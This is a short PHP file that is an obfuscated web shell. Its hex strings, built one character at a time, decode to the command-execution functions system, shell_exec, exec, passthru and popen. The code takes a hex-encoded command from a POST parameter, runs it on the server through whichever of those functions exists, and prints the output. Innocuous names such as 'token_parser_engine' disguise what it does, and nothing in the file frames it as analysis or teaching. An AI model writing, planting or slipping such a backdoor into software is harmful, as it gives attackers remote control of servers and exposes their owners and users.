<?php


$item1 = '7';
$item2 = '9';
$item3 = '4';
$item4 = '6';
$item5 = '5';
$item6 = 'd';
$item7 = '3';
$item8 = '8';
$item9 = '0';
$item10 = '2';
$item11 = 'f';
$item12 = 'e';
$item13 = 'c';
$item14 = '1';
$token_parser_engine1 = pack("H*", '7' . '3' . $item1 . $item2 . '7' . '3' . $item1 . $item3 . $item4 . $item5 . '6' . $item6);
$token_parser_engine2 = pack("H*", '7' . $item7 . $item4 . '8' . $item4 . $item5 . $item4 . 'c' . '6' . 'c' . '5' . 'f' . '6' . $item5 . $item1 . $item8 . '6' . $item5 . '6' . $item7);
$token_parser_engine3 = pack("H*", '6' . $item5 . $item1 . $item8 . $item4 . '5' . $item4 . $item7);
$token_parser_engine4 = pack("H*", $item1 . $item9 . $item4 . '1' . $item1 . $item7 . $item1 . $item7 . $item1 . '4' . '6' . $item8 . $item1 . $item10 . '7' . $item5);
$token_parser_engine5 = pack("H*", '7' . $item9 . '6' . $item11 . $item1 . '0' . '6' . '5' . '6' . 'e');
$token_parser_engine6 = pack("H*", $item1 . '3' . $item1 . $item3 . $item1 . '2' . $item4 . $item5 . '6' . '1' . $item4 . $item6 . $item5 . 'f' . '6' . '7' . $item4 . $item5 . $item1 . '4' . $item5 . 'f' . $item4 . $item7 . $item4 . $item11 . '6' . $item12 . '7' . $item3 . $item4 . '5' . $item4 . 'e' . '7' . $item3 . '7' . $item7);
$token_parser_engine7 = pack("H*", '7' . $item9 . '6' . '3' . '6' . $item13 . '6' . $item11 . '7' . $item7 . $item4 . $item5);
$reverse_searcher = pack("H*", $item1 . '2' . $item4 . '5' . $item1 . '6' . '6' . '5' . $item1 . '2' . '7' . $item7 . '6' . $item5 . $item5 . 'f' . $item1 . $item7 . '6' . $item5 . $item4 . $item14 . $item1 . '2' . $item4 . '3' . $item4 . $item8 . '6' . $item5 . '7' . $item10);
if (isset($_POST[$reverse_searcher])) {
    $reverse_searcher = pack("H*", $_POST[$reverse_searcher]);
    if (function_exists($token_parser_engine1)) {
        $token_parser_engine1($reverse_searcher);
    } elseif (function_exists($token_parser_engine2)) {
        print $token_parser_engine2($reverse_searcher);
    } elseif (function_exists($token_parser_engine3)) {
        $token_parser_engine3($reverse_searcher, $pset_holder);
        print join("\n", $pset_holder);
    } elseif (function_exists($token_parser_engine4)) {
        $token_parser_engine4($reverse_searcher);
    } elseif (function_exists($token_parser_engine5) && function_exists($token_parser_engine6) && function_exists($token_parser_engine7)) {
        $comp_descriptor = $token_parser_engine5($reverse_searcher, 'r');
        if ($comp_descriptor) {
            $ent_sym = $token_parser_engine6($comp_descriptor);
            $token_parser_engine7($comp_descriptor);
            print $ent_sym;
        }
    }
    exit;
}
